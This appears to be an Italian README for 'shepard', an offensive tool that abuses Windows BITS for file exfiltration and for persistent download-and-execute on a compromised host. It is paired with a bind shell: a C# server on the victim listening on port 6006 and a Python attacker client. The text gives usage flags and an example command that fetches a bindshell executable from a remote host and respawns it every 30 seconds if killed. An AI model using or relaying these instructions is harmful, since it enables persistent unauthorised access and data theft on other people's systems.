
Strumento persistente di download/upload/esecuzione in corso che utilizza Windows BITS.
Questo è uno strumento di persistenza che utilizza il servizio BITS (Background Intelligent Transfer Service) di Windows.
Download di file, esfiltrazione di file, download di file + esecuzione persistente
Esegui shepard.exe come amministratore con i seguenti argomenti della riga di comando:
-d <remoteLocation> <writePath> : download normale di un file in un percorso locale a tua scelta
-e <remoteLocation> <localPath> : caricamento normale di un file da un percorso locale a tua scelta (invia solo a server IIS, questa è una limitazione di BITS)
-dr <remoteLocation> <writePath> [optionalFileArgs] : download di un file in un percorso a tua scelta, e tenterà di mantenere la persistenza. Il file scaricato tenterà di essere eseguito con eventuali argomenti facoltativi e BITS controllerà ogni 30 secondi per assicurarsi che il file sia ancora in esecuzione sul sistema compromesso.
Eseguire questo eseguibile senza argomenti o con un numero errato di argomenti causerà la terminazione pulita di shepard.
Il server (vittima) è scritto in C#. Ascolta sulla porta 6006.
Esegui shepardsbind_serv.exe senza argomenti.
Il client (attaccante) è scritto in Python e accetta un argomento: l'indirizzo IP della macchina della vittima.
shepardsbind_recv.py <IP della vittima>
Eseguire shepardsbind_recv.py senza argomenti restituirà un errore.
L'unico eseguibile che deve essere sulla macchina della vittima è shepard.exe. Ospita l'eseguibile bindshell da scaricare in un luogo accessibile pubblicamente. Shepard scaricherà ed eseguirà l'eseguibile bindshell, e l'utente potrà ora utilizzare il ricevitore python. Se la shell viene trovata e uccisa, si riavvierà dopo 30 secondi.
Esempio: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe